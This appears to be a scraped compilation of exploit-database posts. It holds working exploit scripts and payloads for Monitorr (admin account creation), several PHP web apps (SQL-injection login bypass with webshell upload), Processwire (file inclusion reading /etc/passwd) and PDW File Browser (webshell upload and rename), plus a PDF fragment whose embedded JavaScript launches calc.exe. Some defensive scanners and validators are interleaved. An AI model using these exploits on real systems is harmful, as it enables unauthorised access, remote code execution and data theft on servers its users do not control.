>>
endobj
5 0 obj
<<
/Length 94
/Filter/FlateDecode
>>
stream
xœŠ»@@EûùŠ[RØk x•ÄüW"DDçëœâžÜœ›b°ý“{‡éTg†¼tS)dÛ‘±=dœþ+9Ÿ_ÄifÔÈŒ [ŽãB_5!d§ZhP>¯ ‰
endstream
endobj
6 0 obj
<<
/Type/ExtGState
/ca 1
>>
endobj
7 0 obj
<<
/Type/FontDescriptor
/Ascent 833
/CapHeight 592
/Descent -300
/Flags 32
/FontBBox[-192 -710 702 1221]
/ItalicAngle 0
/StemV 0
/XHeight 443
/FontName/CourierNew,Bold
>>
endobj
8 0 obj
<<
/Type/Font
/Subtype/TrueType
/BaseFont/CourierNew,Bold
/Encoding/WinAnsiEncoding
/FontDescriptor 7 0 R
/FirstChar 0
/LastChar 255
/Widths[600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600
600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600 600]
>>
endobj
9 0 obj
<<
/S/JavaScript
/JS(app.opencPDFWebPage\('C:\\\\Windows\\\\System32\\\\calc.exe'\) )
>>
endobj
10 0 obj
<<
/Names[(EmbeddedJS)9 0 R]
>>
endobj
xref
0 11
0000000000 65535 f
0000000015 00000 n
0000000170 00000 n
0000000250 00000 n
0000000305 00000 n
0000000560 00000 n
0000000724 00000 n
0000000767 00000 n
0000000953 00000 n
0000002137 00000 n
0000002235 00000 n
trailer
<<
/ID[<7018DE6859F23E419162D213F5C4D583><7018DE6859F23E419162D213F5C4D583>]
/Info 1 0 R
/Root 2 0 R
/Size 11
>>
startxref
2283
%%EOF
-
Monitorr 1.7.6m - Authorization Bypass
#!/usr/bin/python
# -*- coding: UTF-8 -*-
# Exploit Title: Monitorr 1.7.6m - Authorization Bypass
# Date: September 12, 2020
# Exploit Author: Lyhin's Lab
# Detailed Bug Description: https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
# Software Link: https://github.com/Monitorr/Monitorr
# Version: 1.7.6m
# Tested on: Ubuntu 19

# Monitorr 1.7.6m allows creation of administrative accounts by abusing the installation URL.

import requests
import os
import sys

if len (sys.argv) != 5:
    print ("specify params in format: python " + sys.argv[0] + " target_url user_login user_email user_password")
else:
    url = sys.argv[1] + "/assets/config/_installation/_register.php?action=register"
    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "application/x-www-form-urlencoded", "Origin": url, "Connection": "close", "Referer": url, "Upgrade-Insecure-Requests": "1"}
    data = {"user_name": sys.argv[2], "user_email": sys.argv[3], "user_password_new": sys.argv[4], "user_password_repeat": sys.argv[4], "register": "Register"}
    requests.post(url, headers=headers, data=data)
    print ("Done.")
-
Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Exploit Title: Complaints Report Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 3-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14566/complaints-report-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/complaints-report-management-system.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46
# CVE ID : N/A

# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz

#!/usr/bin/python3

import requests
import time

def sqli_admin():
    s = requests.Session()
    data = {"username":"admin'or'1'=1#","password":"hacked"}
    adminlogin = "http://localhost/crms/admin/ajax.php?action=save_settings"
    s.post(adminlogin,data=data)
    return s

def trigger_rce(session):
    starttime = int(time.time())
    multipart_form_data = {
        "name": ("cyberscurity"),
        "email": ("test@test.com"),
        "contact" : ("+11111111111"),
        "about" : ("Nothing much about it"),
        "img" : ("shell.php", open("shell.php", "rb"))
    }
    session.post("http://localhost/crms/admin/ajax.php?action=save_settings", files=multipart_form_data)
    get_shell(starttime-100,starttime+100,session)

def get_shell(start,end,session):
    for i in range(start,end):
        session.get("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php")
        response = requests.get ("http://localhost/crms/admin/assets/uploads/"+ str(i) +"_shell.php")
        if response.status_code == 200:
            print("http://localhost/crms/admin/assets/uploads/"+str(i)+"_shell.php")

def main():
    session = sqli_admin()
    trigger_rce(session)

if __name__ == '__main__':
    main()
-
Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection
# Title: Multi Restaurant Table Reservation System 1.0 - 'table_id' Unauthenticated SQL Injection
# Exploit Author: yunaranyancat
# Date: 02-11-2020
# Vendor Homepage: www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/tablereservation.zip
# Version: 1.0
# Tested On: Ubuntu 18.04 + XAMPP

# Description
The file view-chair-list.php does not perform input validation on the table_id parameter, which allows unauthenticated SQL Injection. An attacker can send malicious input in the GET request to /dashboard/view-chair-list.php?table_id= to trigger the vulnerability.

# POC N°1 = Time based blind SQLi

GET /TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+- HTTP/1.1
Host: [TARGET IP/URL]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

### Server will sleep for 10 seconds before returning the response

# POC N° 2 = UNION based SQLi

### Request (getting current user)
GET /TableReservation/dashboard/view-chair-list.php?table_id=%27%20UNION%20ALL%20SELECT%20CONCAT%280x7176787071%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x71716b7071%29%2CNULL%2CNULL--%20- HTTP/1.1
Host: [TARGET IP/URL]
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Length: 2

### Response
...
<td class="center hidden-phone"> <a href="delete-chair.php?chair_id=[REDACTED]root@localhost[REDACTED] class="btn btn-danger" onclick="if (!Done()) return false; ">Delete Chair</a>
...
-
Quick N Easy FTP Service 3.2 - Unquoted Service Path
# Exploit Title: Quick 'n Easy FTP Service 3.2 - Unquoted Service Path
# Discovery by: yunaranyancat
# Discovery Date: October 2020
# Vendor Homepage: https://www.pablosoftwaresolutions.com/html/quick__n_easy_ftp_service.html
# Software Link : www.pablosoftwaresolutions.com/download.php?id=10
# Tested Version: 3.2
# Vulnerability Type: Unquoted Service Path
# Tested on OS: Windows 7

# Vulnerability discovery:
Registry value : HKLM\SYSTEM\ControlSet001\Services\Quick 'n Easy FTP Service

# Service info:
C:\>sc qc "Quick 'n Easy FTP Service"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Quick 'n Easy FTP Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   Normal
        BINARY_PATH_NAME   : C:\Program Files (x86)\Quick 'n Easy FTP Service\ftpservice.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Quick 'n Easy FTP Service
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# Exploit:
This vulnerability could permit executing code during startup or reboot with the escalated privileges.
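An added audit helper, not part of the post above: it reads the BINARY_PATH_NAME field from `sc qc` output like the one shown, flags an image path that contains spaces but is not quoted, lists the locations the service control manager would try before the real executable (the directories a defender must confirm are not writable by standard users), and produces the quoted value the service configuration should hold. The sample output is constructed from the post's service name and path; the other fields are illustrative.

```python
import re

# Constructed `sc qc` output in the shape shown in the post above, using the page's
# service name and BINARY_PATH_NAME; the remaining fields are illustrative.
SC_QC_OUTPUT = r"""[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Quick 'n Easy FTP Service
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files (x86)\Quick 'n Easy FTP Service\ftpservice.exe
        SERVICE_START_NAME : LocalSystem
"""

def binary_path(sc_output):
    """Return the BINARY_PATH_NAME value from `sc qc` output, or None if absent."""
    m = re.search(r"^\s*BINARY_PATH_NAME\s*:\s*(.*?)\s*$", sc_output, re.MULTILINE)
    return m.group(1) if m else None

def image_path(binpath):
    """Strip command-line arguments: keep everything up to and including the first .exe."""
    end = binpath.lower().find(".exe")
    return binpath if end < 0 else binpath[:end + 4]

def is_unquoted_with_spaces(binpath):
    """The misconfiguration: an image path that contains spaces but is not quoted."""
    if not binpath or binpath.startswith('"'):
        return False
    return " " in image_path(binpath)

def search_candidates(binpath):
    """Files the service control manager would try, in order, before the real image.
    A defender checks that none of their parent directories is writable by standard users."""
    parts = image_path(binpath).split(" ")
    return [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]

def quoted_binpath(binpath):
    """The fix: quote the image path (what the service's ImagePath value should hold)."""
    image = image_path(binpath)
    return '"' + image + '"' + binpath[len(image):]

if __name__ == "__main__":
    path = binary_path(SC_QC_OUTPUT)
    if is_unquoted_with_spaces(path):
        print("Unquoted service path:", path)
        print("Tried first:", search_candidates(path))
        print("Fix: binPath=", quoted_binpath(path))
```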
-
Title: Some tools commonly used in Android penetration testing
In this article, we will briefly summarize some of the reverse-engineering tools commonly used in Android penetration testing and their basic usage.

Apktool
Apktool is the most commonly used Android decompilation tool. It supports multiple platforms, and on Linux we can install it directly with apt:
apt-get install apktool
Help command:
apktool -h
Basic use: to decompile an Android apk file, use the -d command:
apktool d xxxx.apk
If you need to build the apk back, use the -b command:
apktool b xxxx
Please do not confuse the two.

dex2jar
dex2jar is used to convert DEX files into JAR files; we need this tool when we want to read the source code of a program. To install dex2jar from source, download the source archive from the official dex2jar site (https://sourceforge.net/projects/dex2jar/) and unzip it. Then enter the unpacked directory in a terminal and run the following command to compile:
./gradlew build
After compilation, the executable is located in dex-tools/build/distributions/dex-tools-.zip. Unzip that archive and you will get the executable. If you do not want to compile, you can download a prebuilt release directly from the GitHub repository.

JD-GUI
If you need to decompile ordinary Java programs, or do simple decompilation and viewing of Android applications, you can use JD-GUI. For more in-depth decompilation and analysis of Android applications, JADX is recommended. Download address: http://java-decompiler.github.io/

Frida
A dynamic code injection tool that can modify and debug Android applications at runtime. To install:
pip3 install frida
sudo pip3 install frida-tools
Note that the computer needs a Python environment. We will explain its specific usage in detail in a following article.
-
Processwire CMS 2.4.0 - 'download' Local File Inclusion
# Exploit Title: [Local File Inclusion Processwire CMS 2.4.0]
# Vulnerability Type: Unauthenticated LFI
# Date: [03.11.2020]
# Exploit Author: [Y1LD1R1M]
# Type: [WEBAPPS]
# Platform: [PHP]
# Vendor Homepage: [https://processwire.com/]
# Version: [2.4.0]
# Tested on: [Kali Linux]

** Description **
Local File Inclusion in Processwire CMS 2.4.0 allows retrieving arbitrary files via the download parameter of index.php. By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.

** Proof of Concept **
http://URL/index.php?download=/etc/passwd
http://URL/index.php?download=../config.php
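Added detection example, not from either post: a small Python scanner that percent-decodes query parameters from Apache-style access-log lines and flags the time-based and UNION-based injection shapes used against view-chair-list.php (table_id) in the Multi Restaurant Table Reservation post above, and the traversal / absolute-path values used against the download parameter here. The log lines are constructed from the requests in the two posts; the rule names and patterns are my own.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access-log lines modelled on the requests in the two posts
# above (the first and last entries are benign traffic for contrast).
SAMPLE_LOG = r"""
10.0.0.5 - - [02/Nov/2020:10:00:01 +0000] "GET /TableReservation/dashboard/view-chair-list.php?table_id=3 HTTP/1.1" 200 5120
10.0.0.9 - - [02/Nov/2020:10:00:07 +0000] "GET /TableReservation/dashboard/view-chair-list.php?table_id='+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))a)--+- HTTP/1.1" 200 5120
10.0.0.9 - - [02/Nov/2020:10:00:19 +0000] "GET /TableReservation/dashboard/view-chair-list.php?table_id=%27%20UNION%20ALL%20SELECT%20CONCAT%280x7176787071%2CIFNULL%28CAST%28CURRENT_USER%28%29%20AS%20NCHAR%29%2C0x20%29%2C0x71716b7071%29%2CNULL%2CNULL--%20- HTTP/1.1" 200 6033
10.0.0.9 - - [03/Nov/2020:11:15:00 +0000] "GET /index.php?download=../config.php HTTP/1.1" 200 1822
10.0.0.9 - - [03/Nov/2020:11:15:02 +0000] "GET /index.php?download=/etc/passwd HTTP/1.1" 200 2931
10.0.0.7 - - [03/Nov/2020:11:16:00 +0000] "GET /index.php?download=brochure.pdf HTTP/1.1" 200 90311
""".strip().splitlines()

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Rules run against each *decoded* parameter value, so percent- and plus-encoding
# (as in the UNION request above) does not hide the payload from the patterns.
RULES = {
    "SQLI_TIME":  re.compile(r"\b(sleep|benchmark|pg_sleep)\s*\(", re.I),
    "SQLI_UNION": re.compile(r"\bunion\b[\s\S]*\bselect\b", re.I),
    "LFI":        re.compile(r"(^|[\\/])\.\.([\\/]|$)|^/(etc|proc|windows)/", re.I),
}

def decoded_params(target):
    """Return {parameter: [decoded values]} for the request target's query string."""
    return parse_qs(urlsplit(target).query, keep_blank_values=True)

def scan_log(lines):
    """Return (line_index, rule_name, parameter) for every rule that fires."""
    alerts = []
    for idx, line in enumerate(lines):
        m = REQUEST_LINE.search(line)
        if not m:
            continue  # not a parseable request line
        for param, values in decoded_params(m.group("target")).items():
            for value in values:
                for rule, pattern in RULES.items():
                    if pattern.search(value):
                        alerts.append((idx, rule, param))
    return alerts

if __name__ == "__main__":
    for idx, rule, param in scan_log(SAMPLE_LOG):
        print(f"line {idx}: {rule} via parameter '{param}'")
```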
-
School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Exploit Title: School Log Management System 1.0 - 'username' SQL Injection / Remote Code Execution
# Date: 4-11-2020
# Exploit Author: mosaaed
# Vendor Homepage: https://www.sourcecodester.com/php/14562/school-log-management-system-using-phpmysqli-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip
# Version: 1.0
# Tested on: Parrot 5.5.17 + Apache 2.4.46

# replace shell.php with your own php reverse shell
# change [TARGET URL] to target URL or IP address
# setup your netcat listener for sum good ol shellz

#!/usr/bin/python3
import requests
import time


def sqli_admin():
    s = requests.Session()
    data = {"username": "admin'or'1'=1#", "password": "hacked"}
    adminlogin = "http://localhost/slms/admin/ajax.php?action=save_settings"
    s.post(adminlogin, data=data)
    return s


def trigger_rce(session):
    starttime = int(time.time())
    multipart_form_data = {
        "name": ("cyberscurity"),
        "email": ("test@test.com"),
        "contact": ("+11111111111"),
        "about": ("Nothing much about it"),
        "img": ("shell.php", open("shell.php", "rb"))
    }
    session.post("http://localhost/slms/admin/ajax.php?action=save_settings", files=multipart_form_data)
    get_shell(starttime - 100, starttime + 100, session)


def get_shell(start, end, session):
    for i in range(start, end):
        session.get("http://localhost/slms/admin/assets/uploads/" + str(i) + "_shell.php")
        response = requests.get("http://localhost/slms/admin/assets/uploads/" + str(i) + "_shell.php")
        if response.status_code == 200:
            print("http://localhost/slms/admin/assets/uploads/" + str(i) + "_shell.php")


def main():
    session = sqli_admin()
    trigger_rce(session)


if __name__ == '__main__':
    main()
-
PDW File Browser 1.3 - Remote Code Execution
# Exploit Title: PDW File Browser 1.3 - Remote Code Execution
# Date: 24-10-2020
# Exploit Author: David Bimmel
# Researchers: David Bimmel, Joost Vondeling, Ramòn Janssen
# Vendor Homepage: n/a
# Software Link: https://github.com/GuidoNeele/PDW-File-Browser
# Version: <=1.3

Attack type: Remote
Impact: Remote Code Execution

The PDW File Browser is a plugin for the TinyMCE and CKEditor WYSIWYG editors. The PDW File Browser contains a critical software vulnerability which results in remote code execution on the web server. This vulnerability can be exploited by all authenticated users.

Steps to RCE:

Upload a .txt file containing your webshell code using the default file upload functionality within the PDW File Browser. Please note that all users (including unauthenticated users) are able to access your webshell later on. For security purposes I would recommend using weevely (https://github.com/epinna/weevely3), as this obfuscates and password-protects your webshell. Below I have provided how the request should look for uploading your WEBSHELL.txt file.

POST /ckeditor/plugins/pdw_file_browser/ajax_php_uploader.php?uploadpath=%2Fmedia%2F&qqfile=WEBSHELL.txt HTTP/1.1
Host: <HOSTNAME>
[…]

<?php <WEBSHELLCODE HERE> ?>

Once you have uploaded your webshell with a .txt extension (WEBSHELL.txt), you are able to rename the file using the rename functionality of the PDW File Browser. Within this functionality it is possible both to change the file extension of your WEBSHELL from .txt to .php and to move the file to an arbitrary location on the web server. The path to the arbitrary location should contain double-encoded characters. Below I have provided an example which both renames our WEBSHELL.txt to WEBSHELL.php and relocates the file to the 'content' directory.

POST /ckeditor/plugins/pdw_file_browser/actions.php HTTP/1.1
Host: <HOSTNAME>
[…]

action=rename&new_filename=%252E%252E%252Fcontent%252FWEBSHELL.php&old_filename=WEBSHELL.txt&folder=%252Fmedia%252F&type=file

After this request your webshell should be located at 'https://<TARGET>/content/WEBSHELL.php'

Happy Hacking :^)
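Added example, not the plugin's own code: it shows why a filter that percent-decodes only once does not see the traversal in the rename value above, and a hardened validator that decodes until the value stops changing before rejecting path characters and extensions outside an allow-list. The allow-list, the function names and the policy itself are assumptions made for illustration.

```python
from urllib.parse import unquote
import posixpath

# Assumed policy for this example (not the plugin's): a renamed file keeps a
# non-executable, allow-listed extension and may not contain path components.
ALLOWED_EXTENSIONS = {".txt", ".jpg", ".jpeg", ".png", ".gif", ".pdf"}

def fully_decode(value, max_rounds=5):
    """Percent-decode until the value stops changing, so %252E%252E is seen as '..'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            return value
        value = decoded
    raise ValueError("too many encoding layers")

def naive_check(new_filename):
    """A single-decode filter: the double-encoded rename from the post passes it."""
    once = unquote(new_filename)
    return ".." not in once and "/" not in once and "\\" not in once

def validate_rename(new_filename):
    """Return the safe target name, or raise ValueError on traversal or a bad extension."""
    target = fully_decode(new_filename)
    if any(ch in target for ch in ("/", "\\", "\x00")) or ".." in target:
        raise ValueError("filename must not contain path characters: %r" % target)
    ext = posixpath.splitext(target)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        raise ValueError("extension %r not allowed" % ext)
    return target

def rename_allowed(new_filename):
    """Boolean convenience wrapper around validate_rename."""
    try:
        validate_rename(new_filename)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    payload = "%252E%252E%252Fcontent%252FWEBSHELL.php"  # the value from the post above
    print("single-decode filter passes payload:", naive_check(payload))
    print("hardened check allows payload:", rename_allowed(payload))
```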